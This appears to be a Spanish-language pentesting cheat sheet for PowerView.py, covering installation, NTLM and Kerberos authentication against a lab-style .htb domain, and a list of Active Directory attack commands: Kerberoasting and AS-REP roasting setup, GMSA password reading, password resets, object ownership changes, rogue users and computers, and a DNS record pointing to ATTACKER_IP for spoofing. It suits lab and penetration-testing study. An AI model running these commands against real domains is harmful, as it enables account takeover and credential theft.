PowerView.py

Anteriorldapsearch SiguienteBasic Enumeration

Última actualización hace 1 mes

PowerView.py

Introduction

PowerView.py es una alternativa al fantástico script original PowerView.ps1. La mayoría de los módulos utilizados en PowerView están disponibles aquí (algunos de los indicadores han cambiado). El objetivo principal es lograr una sesión interactiva sin tener que autenticarse repetidamente en LDAP.

Installation

sudo apt install libkrb5-dev
pip3 install powerview --break-system-packages

Use

Autenticación básica NTLM

powerview dominio.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10

Autenticación mediante Kerberos

powerview dominio.htb/'user'@dc.dominio.htb --dc-ip dc.dominio.htb -ns dc.dominio.htb -k --no-pass

Web Browser

powerview dominio.htb/'user':'password'@10.10.10.10 --web --web-host 127.0.0.1 --web-port 3000

Attacking AD using PowerView.py

# Añadir usuario a un grupo

Add-DomainGroupMember -Identity 'GROUP_TARGET' -Members 'USER_TARGET'

# Asignar servicePrincipalName (SPN) a un usuario para Kerberoasting Attack (Necesario disponer permisos GenericAll/GenericWrite sobre el usuario $target)

Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'

# Deshabilitar ACCOUNTDISABLE para habilitar a un usuario deshabilitado

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=66048'

# Habilitar DONT_REQ_PREAUTH para ASREP Roast (Necesario disponer permisos GenericAll/GenericWrite sobre el usuario $target)

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'

# Leer contraseña GMSA

Get-GMSA

# Kerberoasting Attack

Invoke-Kerberoast

# Modificar contraseña de un usuario

Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

# Convertir el usuario 'user_target' en propietario del objeto 'object_target'

Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'

# Añadir un nuevo Domain Computer

Add-ADComputer -ComputerName 'Gzzcoo' -ComputerPass 'Password01!'

# Añadir un nuevo usuario del dominio

Add-ADUser -UserName 'Gzzcoo' -UserPass 'Password01!'

# Creamos un nuevo registro DNS, para posteriormente realizar ataques de DNS Spoofing.

Add-DomainDNSRecord -RecordName '<dns_record_target>' -RecordAddress <ATTACKER_IP>